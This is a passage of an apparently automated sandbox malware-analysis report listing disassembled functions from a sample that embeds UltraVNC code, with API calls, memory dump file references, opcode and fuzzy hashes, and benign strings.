                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF790C5A5D6
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
                                                      • API String ID: 3168844106-2727237473
                                                      • Opcode ID: 7ea70ecdf00bad4228af3a672ca1c2fbbeb6b4775179ba25f3cb68a3c055f025
                                                      • Instruction ID: deff6168abec9eb99b99486d080b019d1101013a9f62cf0372687293ef6e226e
                                                      • Opcode Fuzzy Hash: 7ea70ecdf00bad4228af3a672ca1c2fbbeb6b4775179ba25f3cb68a3c055f025
                                                      • Instruction Fuzzy Hash: 5161CC2662C7C299EA74AB3694047FAA7A0FF4A794F840235EA9D477C1DF3CE485C710
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DataRegion$DeleteObject
                                                      • String ID:
                                                      • API String ID: 3467850875-0
                                                      • Opcode ID: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
                                                      • Instruction ID: a7398f690123c81dd3dc51e3571af73b33f4293bf4b5cbb54e68ab40f7a74d8c
                                                      • Opcode Fuzzy Hash: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
                                                      • Instruction Fuzzy Hash: DA51A0B2A15A41C7D760DF39D480AADB7F1FB49B94B959232DA4D83754DF38E882CB00
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CountEnterInitializeSpin_amsg_exit_lockfree
                                                      • String ID:
                                                      • API String ID: 3786353176-0
                                                      • Opcode ID: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                      • Instruction ID: faa1d5519ba1a639b067928c08b2525f7659b627cf30bbcc412b8aead3b8babd
                                                      • Opcode Fuzzy Hash: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                      • Instruction Fuzzy Hash: CF418226A38A4285EB20AB35D5553BDB361FF45B80F955136DA4D073E1CF2CF4048325
                                                      APIs
                                                      • malloc.LIBCMT ref: 00007FF790C3C5D4
                                                        • Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
                                                        • Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
                                                        • Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
                                                        • Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
                                                        • Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$AllocHeap_callnewhmalloc
                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
                                                      • API String ID: 908589684-1814909704
                                                      • Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                      • Instruction ID: a062214b49344586410f3fe9f62a9f9bd63850d509a631d5c7468e3b61fcba2a
                                                      • Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                      • Instruction Fuzzy Hash: 9F219C33B28B9546D7609B79A880268F7A5EB45791F881236EBAC47BC5DE39E042C710
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2819658684-0
                                                      • Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                      • Instruction ID: e80e85fb94999ca63946e6585dc9687735528f3f174e108878028b6cd98200b8
                                                      • Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                      • Instruction Fuzzy Hash: 29218021A2D28345FB31BB3169122BDE2D4AF46BC0F845435EE8D47B86DE2CF901A721
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
                                                      • String ID: G
                                                      • API String ID: 2834860089-985283518
                                                      • Opcode ID: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
                                                      • Instruction ID: d4765061f98e781f0461a707d6ef2d1e1a6d4e453a41da1f191b25a7d1689fd1
                                                      • Opcode Fuzzy Hash: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
                                                      • Instruction Fuzzy Hash: 02318132528B8286E720AF74E4442A8B3A4FF45BA4F941235DA9D47BD5CF7CF491C721
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 948891078-0
                                                      • Opcode ID: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                      • Instruction ID: ec724c17b29fc4fb664716f28e06fb7fd872ecdca6306281166b5cc1f34e414c
                                                      • Opcode Fuzzy Hash: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                      • Instruction Fuzzy Hash: 81213032A29B4182E760DB39E44426EB3B0FB89B54F901131EB9E837A4DF3DE454CB10
                                                      APIs
                                                      • malloc.LIBCMT ref: 00007FF790CB3CCE
                                                        • Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
                                                        • Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
                                                        • Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
                                                        • Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
                                                        • Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8
                                                      • free.LIBCMT ref: 00007FF790CB3CFA
                                                        • Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
                                                        • Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
                                                        • Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C
                                                      • free.LIBCMT ref: 00007FF790CB3D0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                      • String ID: Unable to allocate memory in zip library at %s
                                                      • API String ID: 1063416079-1743894623
                                                      • Opcode ID: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
                                                      • Instruction ID: e4905d43d6026afbbe0b9cdd6cc7918fad808520f8513c918f32550e3019210d
                                                      • Opcode Fuzzy Hash: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
                                                      • Instruction Fuzzy Hash: E611B421639B8285EA70EB35A5401BAB760EF46794F881232EA9D477D6CE2CF541C714
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Global$FreeUnlock
                                                      • String ID:
                                                      • API String ID: 1239146723-0
                                                      • Opcode ID: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                      • Instruction ID: c3363f2d7a3ad03bb9ef2588534dbebb0594f1cb7a5e3c741013dc8b711ea9e6
                                                      • Opcode Fuzzy Hash: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                      • Instruction Fuzzy Hash: 5E214F25A39A4186EB20AF31E8501A8A3B8FF84F84F485435EE4D83754CF7CE461C750
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
                                                      • String ID:
                                                      • API String ID: 1747828912-0
                                                      • Opcode ID: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                      • Instruction ID: 2df582b219a3dd22831090320ad6b44b946b194626c3588712a8be1c299d04d2
                                                      • Opcode Fuzzy Hash: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                      • Instruction Fuzzy Hash: F9113872A28B51A6E7149F35E984159B7B4FB48B90F90613AEB4D43B50CF38F071CB50
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32 ref: 00007FF790C592F0
                                                        • Part of subcall function 00007FF790CC7520: EnterCriticalSection.KERNEL32 ref: 00007FF790CC7534
                                                        • Part of subcall function 00007FF790CC7520: ReleaseSemaphore.KERNEL32 ref: 00007FF790CC7577
                                                        • Part of subcall function 00007FF790CC7520: GetLastError.KERNEL32 ref: 00007FF790CC7581
                                                        • Part of subcall function 00007FF790CC7520: LeaveCriticalSection.KERNEL32 ref: 00007FF790CC758C
                                                        • Part of subcall function 00007FF790CC7400: EnterCriticalSection.KERNEL32 ref: 00007FF790CC7427
                                                        • Part of subcall function 00007FF790CC7400: LeaveCriticalSection.KERNEL32 ref: 00007FF790CC7472
                                                        • Part of subcall function 00007FF790CC7400: LeaveCriticalSection.KERNEL32 ref: 00007FF790CC747B
                                                        • Part of subcall function 00007FF790CC7400: WaitForSingleObject.KERNEL32 ref: 00007FF790CC748A
                                                        • Part of subcall function 00007FF790CC7400: EnterCriticalSection.KERNEL32 ref: 00007FF790CC7495
                                                        • Part of subcall function 00007FF790CC7400: GetLastError.KERNEL32 ref: 00007FF790CC74A7
                                                        • Part of subcall function 00007FF790CC7400: EnterCriticalSection.KERNEL32 ref: 00007FF790CC74DE
                                                        • Part of subcall function 00007FF790CC7400: LeaveCriticalSection.KERNEL32 ref: 00007FF790CC7500
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
                                                      • String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
                                                      • API String ID: 1962697109-2518527632
                                                      • Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                      • Instruction ID: 1ea6d66e78c05cd0c95aa5b9d356ead953cde56da706f201b12689fd06005a80
                                                      • Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                      • Instruction Fuzzy Hash: B6117F71A28A8281EB24EF35D4002E9A3A1FF85BA4F885235D95E473E9DF3CE404C760
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterEventLeave
                                                      • String ID:
                                                      • API String ID: 3772564070-0
                                                      • Opcode ID: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                      • Instruction ID: be46e9bdd21ba6dbde761a9c00c69ae5f85fadbfdd6a30d29e4ddaeaf5b4bf08
                                                      • Opcode Fuzzy Hash: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                      • Instruction Fuzzy Hash: 2521C866A39A4691FB24AF35D8943B4F3A1AF89B45FC42132C80E427A08F3CF585C361
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
